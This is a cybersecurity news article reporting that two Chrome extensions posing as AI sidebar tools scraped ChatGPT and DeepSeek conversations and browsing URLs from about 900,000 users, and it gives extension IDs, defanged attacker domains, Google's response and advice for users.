ChatGPT data theft
Artificial Intelligence

ChatGPT Data Theft Exposes 900,000 Chrome Users

Cybersecurity researchers have uncovered a large-scale data theft operation involving malicious Chrome browser extensions that silently harvested ChatGPT and DeepSeek conversations from more than 900,000 users. The affected extensions were distributed through the official Chrome Web Store and masqueraded as legitimate AI productivity tools, giving attackers persistent access to sensitive user data without obvious warning signs.

The incident highlights a growing risk tied to browser extensions and the increasing value of AI chat data, which often contains proprietary code, confidential business discussions, legal research, and personal information. While the attack did not involve a breach of OpenAI or DeepSeek systems themselves, it exploited the browser layer where user trust is often misplaced.

Affected Chrome Extensions

Researchers identified two Chrome extensions at the center of the campaign:

  1. Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI
    Extension ID: fnmihdojmnkclgjpcoonokmkhjpjechg
    Approximate users: 600,000
  2. AI Sidebar with Deepseek, ChatGPT, Claude, and more
    Extension ID: inhcgfpbfdjbjogdfjbclgolkmhnooop
    Approximate users: 300,000

Together, the extensions amassed more than 900,000 installs. One of them was even granted a “Featured” badge by Google at one point, increasing visibility and user trust. Both extensions remain notable examples of how malicious software can thrive inside official marketplaces.

How ChatGPT Chat Data Was Stolen

Once installed, the extensions requested permission to collect what they described as anonymous or non-identifiable analytics data. In practice, these permissions granted broad access to website content, browser tabs, and user activity.

After consent was given, the extensions actively monitored open browser tabs and checked whether users were visiting ChatGPT or DeepSeek. When a supported AI chat page was detected, the malware scanned the page’s structure and extracted both user prompts and AI-generated responses directly from the Document Object Model.

The stolen conversations were stored locally and transmitted in batches to attacker-controlled servers at regular intervals, typically every 30 minutes. This process allowed the extensions to quietly siphon large volumes of chat data without noticeable performance impact or visible alerts.

In parallel, the extensions collected full URLs from all open Chrome tabs. This browsing data could expose search queries, internal corporate dashboards, authentication parameters, private documentation portals, and other sensitive activity unrelated to AI chats.

A key part of the operation involved impersonation. The malicious extensions closely mirrored the design, description, and behavior of a legitimate AI sidebar extension developed by AITOPIA, which itself has around one million users. By copying interface elements and referencing AITOPIA in privacy policies, the attackers created a convincing façade that lowered suspicion and increased installation rates.

While AITOPIA’s legitimate extension discloses that chats processed through its own sidebar may be stored on company servers, it does not scrape conversations directly from ChatGPT or DeepSeek web sessions. The malicious extensions retained the familiar interface but added hidden data exfiltration routines that operated entirely in the background.

Command-and-Control Infrastructure

Researchers traced the exfiltrated data to multiple attacker-controlled domains, including deepaichats[.]com and chatsaigpt[.]com. These servers received AI chat content and browsing data in encoded form, allowing attackers to aggregate and analyze stolen information at scale.

Additional infrastructure, such as privacy policy pages and uninstall redirection sites, was hosted using the Lovable AI web development platform. Investigators believe this approach was intentionally used to complicate attribution and slow down takedown efforts by spreading components across third-party services.

Scope and Potential Impact

The scope of exposure is significant. AI conversations frequently include highly sensitive material, such as proprietary source code, internal architecture discussions, strategic planning notes, legal analysis, medical inquiries, and personally identifiable information shared in confidence with chatbots.

Combined with detailed browsing histories, the stolen data could be leveraged for corporate espionage, targeted phishing campaigns, identity theft, or resale on underground marketplaces. Organizations whose employees installed the affected extensions may have unknowingly exposed internal systems, intellectual property, customer information, and confidential research.

Security researchers warn that browser-based data theft of this nature is particularly dangerous because it bypasses many traditional security controls. The activity occurs inside a trusted user environment and does not rely on exploiting server-side vulnerabilities.

Google’s Response

The malicious extensions were reported to Google in late December 2025. At the time of disclosure, both extensions were still available on the Chrome Web Store, although one had its Featured status removed. Google acknowledged receiving the reports and stated that the matter was under review.

As of publication, Google had not publicly disclosed enforcement actions or clarified how the extensions passed review while engaging in extensive data exfiltration. The incident raises renewed questions about extension vetting processes and the effectiveness of marketplace safeguards.

What Users Should Do

Users who installed either extension are strongly advised to remove them immediately. Extensions can be reviewed and uninstalled by visiting chrome://extensions directly in the browser.

Users should also audit browser permissions and avoid installing extensions that request broad access to website content unless absolutely necessary. Even extensions that appear popular, well-reviewed, or featured should be treated with caution.

Organizations should consider restricting browser extension installation through policy controls and educating employees about the risks associated with AI tools and browser-based integrations.

This incident underscores a broader shift in the threat landscape. As AI tools become deeply embedded in daily workflows, the conversations users have with chatbots are emerging as a high-value target. Browser extensions sit at a powerful intersection between users and web applications, and when abused, they provide attackers with trusted, persistent access to some of the most sensitive data users generate.

For more reporting on state-backed intrusion campaigns and critical infrastructure targeting, explore the latest updates in the artificial intelligence and cybersecurity sections.

Sean Doyle

Sean is a tech author and security researcher with more than 20 years of experience in cybersecurity, privacy, malware analysis, analytics, and online marketing. He focuses on clear reporting, deep technical investigation, and practical guidance that helps readers stay safe in a fast-moving digital landscape. His work continues to appear in respected publications, including articles written for Private Internet Access. Through Botcrawl and his ongoing cybersecurity coverage, Sean provides trusted insights on data breaches, malware threats, and online safety for individuals and businesses worldwide.

View all posts →

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.